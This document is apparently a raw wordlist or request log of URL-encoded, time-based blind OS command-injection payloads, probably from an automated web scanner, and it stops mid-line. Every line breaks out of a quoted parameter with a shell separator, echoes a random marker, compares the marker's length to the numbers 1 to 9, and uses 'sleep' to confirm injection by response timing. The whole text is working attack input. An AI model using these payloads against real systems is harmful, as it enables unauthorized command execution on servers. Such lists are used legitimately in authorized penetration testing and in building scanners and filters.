/\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20IMLEUV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20IMLEUV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20IMLEUV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20IMLEUV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20IMLEUV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20IMLEUV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20IMLEUV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%2527%0A%20str%3D%24%28echo%20RQFVAS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%2527%0A%20str%3D%24%28echo%20RQFVAS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%2527%0A%20str%3D%24%28echo%20RQFVAS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%2527%0A%20str%3D%24%28echo%20RQFVAS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%2527%0A%20str%3D%24%28echo%20RQFVAS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%2527%0A%20str%3D%24%28echo%20RQFVAS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%2527%0A%20str%3D%24%28echo%20RQFVAS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%2527%0A%20str%3D%24%28echo%20RQFVAS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%2527%0A%20str%3D%24%28echo%20RQFVAS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%2527%3B%20str%3D%24%28echo%20NSSNST%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%2527%3B%20str%3D%24%28echo%20NSSNST%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%2527%3B%20str%3D%24%28echo%20NSSNST%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%2527%3B%20str%3D%24%28echo%20NSSNST%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%2527%3B%20str%3D%24%28echo%20NSSNST%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%2527%3B%20str%3D%24%28echo%20NSSNST%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%2527%3B%20str%3D%24%28echo%20NSSNST%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%2527%3B%20str%3D%24%28echo%20NSSNST%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%2527%3B%20str%3D%24%28echo%20NSSNST%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%2527%7C%20%5B%201%20-ne%20%24%28echo%20GQBAPT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%2527%7C%20%5B%202%20-ne%20%24%28echo%20GQBAPT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%2527%7C%20%5B%203%20-ne%20%24%28echo%20GQBAPT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%2527%7C%20%5B%204%20-ne%20%24%28echo%20GQBAPT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%2527%7C%20%5B%205%20-ne%20%24%28echo%20GQBAPT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%2527%7C%20%5B%206%20-ne%20%24%28echo%20GQBAPT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%2527%7C%20%5B%207%20-ne%20%24%28echo%20GQBAPT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%2527%7C%20%5B%208%20-ne%20%24%28echo%20GQBAPT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%2527%7C%20%5B%209%20-ne%20%24%28echo%20GQBAPT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20EEDNGD%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20EEDNGD%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20EEDNGD%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20EEDNGD%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20EEDNGD%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20EEDNGD%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20EEDNGD%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20EEDNGD%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20EEDNGD%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%2527%0A%20str%3D%24%28echo%20WYAQUW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%2527%0A%20str%3D%24%28echo%20WYAQUW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%2527%0A%20str%3D%24%28echo%20WYAQUW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%2527%0A%20str%3D%24%28echo%20WYAQUW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%2527%0A%20str%3D%24%28echo%20WYAQUW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%2527%0A%20str%3D%24%28echo%20WYAQUW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%2527%0A%20str%3D%24%28echo%20WYAQUW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%2527%0A%20str%3D%24%28echo%20WYAQUW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%2527%0A%20str%3D%24%28echo%20WYAQUW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%2527%3B%20str%3D%24%28echo%20IITGSD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%2527%3B%20str%3D%24%28echo%20IITGSD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%2527%3B%20str%3D%24%28echo%20IITGSD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%2527%3B%20str%3D%24%28echo%20IITGSD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%2527%3B%20str%3D%24%28echo%20IITGSD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%2527%3B%20str%3D%24%28echo%20IITGSD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%2527%3B%20str%3D%24%28echo%20IITGSD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%2527%3B%20str%3D%24%28echo%20IITGSD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%2527%3B%20str%3D%24%28echo%20IITGSD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%2527%7C%20%5B%201%20-ne%20%24%28echo%20FMCMJN%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%2527%7C%20%5B%202%20-ne%20%24%28echo%20FMCMJN%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%2527%7C%20%5B%203%20-ne%20%24%28echo%20FMCMJN%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%2527%7C%20%5B%204%20-ne%20%24%28echo%20FMCMJN%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%2527%7C%20%5B%205%20-ne%20%24%28echo%20FMCMJN%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%2527%7C%20%5B%206%20-ne%20%24%28echo%20FMCMJN%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%2527%7C%20%5B%207%20-ne%20%24%28echo%20FMCMJN%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%2527%7C%20%5B%208%20-ne%20%24%28echo%20FMCMJN%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%2527%7C%20%5B%209%20-ne%20%24%28echo%20FMCMJN%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HBIFJL%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HBIFJL%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HBIFJL%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HBIFJL%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HBIFJL%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HBIFJL%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HBIFJL%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HBIFJL%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HBIFJL%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%2527%0A%20str%3D%24%28echo%20IFIPTC%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%2527%0A%20str%3D%24%28echo%20IFIPTC%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%2527%0A%20str%3D%24%28echo%20IFIPTC%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%2527%0A%20str%3D%24%28echo%20IFIPTC%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%2527%0A%20str%3D%24%28echo%20IFIPTC%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%2527%0A%20str%3D%24%28echo%20IFIPTC%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%2527%0A%20str%3D%24%28echo%20IFIPTC%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%2527%0A%20str%3D%24%28echo%20IFIPTC%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%2527%0A%20str%3D%24%28echo%20IFIPTC%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%2527%3B%20str%3D%24%28echo%20TBXNEW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%2527%3B%20str%3D%24%28echo%20TBXNEW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%2527%3B%20str%3D%24%28echo%20TBXNEW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%2527%3B%20str%3D%24%28echo%20TBXNEW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%2527%3B%20str%3D%24%28echo%20TBXNEW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%2527%3B%20str%3D%24%28echo%20TBXNEW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%2527%3B%20str%3D%24%28echo%20TBXNEW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%2527%3B%20str%3D%24%28echo%20TBXNEW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%2527%3B%20str%3D%24%28echo%20TBXNEW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%2527%7C%20%5B%201%20-ne%20%24%28echo%20IQYBMK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%2527%7C%20%5B%202%20-ne%20%24%28echo%20IQYBMK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%2527%7C%20%5B%203%20-ne%20%24%28echo%20IQYBMK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%2527%7C%20%5B%204%20-ne%20%24%28echo%20IQYBMK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%2527%7C%20%5B%205%20-ne%20%24%28echo%20IQYBMK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%2527%7C%20%5B%206%20-ne%20%24%28echo%20IQYBMK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%2527%7C%20%5B%207%20-ne%20%24%28echo%20IQYBMK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%2527%7C%20%5B%208%20-ne%20%24%28echo%20IQYBMK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%2527%7C%20%5B%209%20-ne%20%24%28echo%20IQYBMK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JDGURS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JDGURS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JDGURS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JDGURS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JDGURS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JDGURS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JDGURS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JDGURS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JDGURS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%2527%0A%20str%3D%24%28echo%20GBQYNR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%2527%0A%20str%3D%24%28echo%20GBQYNR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%2527%0A%20str%3D%24%28echo%20GBQYNR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%2527%0A%20str%3D%24%28echo%20GBQYNR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%2527%0A%20str%3D%24%28echo%20GBQYNR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%2527%0A%20str%3D%24%28echo%20GBQYNR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%2527%0A%20str%3D%24%28echo%20GBQYNR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%2527%0A%20str%3D%24%28echo%20GBQYNR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%2527%0A%20str%3D%24%28echo%20GBQYNR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%2527%3B%20str%3D%24%28echo%20OOYLLH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%2527%3B%20str%3D%24%28echo%20OOYLLH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%